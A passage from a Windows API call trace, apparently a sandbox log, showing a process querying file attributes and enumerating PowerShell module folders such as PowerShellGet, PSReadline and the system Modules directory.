lpOldMode=0x1b62e3d8) returned 1 [0332.072] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b62e700 | out: lpFileInformation=0x1b62e700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc99f6e81, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x19e6001c, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0x7b2a31c8, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0xadf)) returned 1 [0332.073] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e388) returned 1 [0332.073] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0332.073] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0332.073] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0332.073] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0332.073] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e418) returned 1 [0332.073] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x23f37b8 | out: lpFileInformation=0x23f37b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc99f6e81, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x19e6001c, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0x7b2a31c8, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0xadf)) returned 1 [0332.073] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e3c8) returned 1 [0332.073] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0332.074] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psm1")) returned 0xffffffff [0332.074] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.cdxml")) returned 0xffffffff [0332.074] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.xaml")) returned 0xffffffff [0332.074] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.ni.dll")) returned 0xffffffff [0332.075] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.dll")) returned 0xffffffff [0332.075] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e648) returned 1 [0332.075] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x36 [0332.075] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x36, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0332.075] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\*"), lpFindFileData=0x1b62e3f0 | out: lpFindFileData=0x1b62e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc86241be, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25c56c03, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a89a980 [0332.075] FindNextFileW (in: hFindFile=0x1a89a980, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc86241be, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25c56c03, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0332.076] FindNextFileW (in: hFindFile=0x1a89a980, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc86241be, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa0cfdc3c, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa0cfdc3c, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2.0.0", cAlternateFileName="")) returned 1 [0332.076] FindNextFileW (in: hFindFile=0x1a89a980, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0332.076] FindClose (in: hFindFile=0x1a89a980 | out: hFindFile=0x1a89a980) returned 1 [0332.076] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e348) returned 1 [0332.076] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e568) returned 1 [0332.076] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\2.0.0\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4c [0332.076] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\2.0.0\\PSReadline.psd1", nBufferLength=0x4c, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\2.0.0\\PSReadline.psd1", lpFilePart=0x0) returned 0x4b [0332.077] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3d8) returned 1 [0332.077] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\2.0.0\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\2.0.0\\psreadline.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b62e700 | out: lpFileInformation=0x1b62e700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc99f6e81, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf54a315b, ftLastAccessTime.dwHighDateTime=0x1d942b1, ftLastWriteTime.dwLowDateTime=0x7b2cb8ab, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x362)) returned 1 [0332.077] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e388) returned 1 [0332.077] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\2.0.0\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4c [0332.077] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\2.0.0\\PSReadline.psd1", nBufferLength=0x4c, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\2.0.0\\PSReadline.psd1", lpFilePart=0x0) returned 0x4b [0332.077] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\2.0.0\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4c [0332.077] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\2.0.0\\PSReadline.psd1", nBufferLength=0x4c, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\2.0.0\\PSReadline.psd1", lpFilePart=0x0) returned 0x4b [0332.077] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e418) returned 1 [0332.077] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\2.0.0\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\2.0.0\\psreadline.psd1"), fInfoLevelId=0x0, lpFileInformation=0x23f5188 | out: lpFileInformation=0x23f5188*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc99f6e81, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf54a315b, ftLastAccessTime.dwHighDateTime=0x1d942b1, ftLastWriteTime.dwLowDateTime=0x7b2cb8ab, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x362)) returned 1 [0332.077] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e3c8) returned 1 [0332.078] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.psd1")) returned 0xffffffff [0332.078] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.psm1")) returned 0xffffffff [0332.078] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.cdxml")) returned 0xffffffff [0332.078] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.xaml")) returned 0xffffffff [0332.079] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.ni.dll")) returned 0xffffffff [0332.079] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.dll")) returned 0xffffffff [0332.082] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules")) returned 0x10 [0332.084] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e648) returned 1 [0332.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x33 [0332.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x33, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0332.084] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\*"), lpFindFileData=0x1b62e3f0 | out: lpFindFileData=0x1b62e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25c7cc15, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x6d90540, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a899660 [0332.084] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25c7cc15, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x6d90540, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0332.084] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25d15261, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xcbd6d157, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask", cAlternateFileName="")) returned 1 [0332.085] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x25d15261, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0332.085] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x25d15261, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppvClient", cAlternateFileName="APPVCL~1")) returned 1 [0332.085] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25d15261, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx", cAlternateFileName="")) returned 1 [0332.085] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x25d3b574, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess", cAlternateFileName="ASSIGN~1")) returned 1 [0332.085] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x25d3b574, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker", cAlternateFileName="BITLOC~1")) returned 1 [0332.085] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25d3b574, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xcbd6d157, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="")) returned 1 [0332.085] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x25d6170d, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache", cAlternateFileName="BRANCH~1")) returned 1 [0332.085] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25d6170d, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xcbd930d4, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="")) returned 1 [0332.085] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x25d6170d, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ConfigCI", cAlternateFileName="")) returned 1 [0332.085] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25d8796d, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xbe00174, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender", cAlternateFileName="")) returned 1 [0332.085] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbd930d4, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DeliveryOptimization", cAlternateFileName="")) returned 1 [0332.085] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbd930d4, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents", cAlternateFileName="")) returned 1 [0332.085] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism", cAlternateFileName="")) returned 1 [0332.086] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbdbb8b3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient", cAlternateFileName="")) returned 1 [0332.086] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbdbb8b3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement", cAlternateFileName="")) returned 1 [0332.086] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbdbb8b3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="International", cAlternateFileName="")) returned 1 [0332.086] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbdbb8b3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI", cAlternateFileName="")) returned 1 [0332.086] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00bc16c, ftCreationTime.dwHighDateTime=0x1d5ace3, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xf00bc16c, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0332.086] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds", cAlternateFileName="")) returned 1 [0332.086] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="")) returned 1 [0332.086] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="")) returned 1 [0332.086] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, 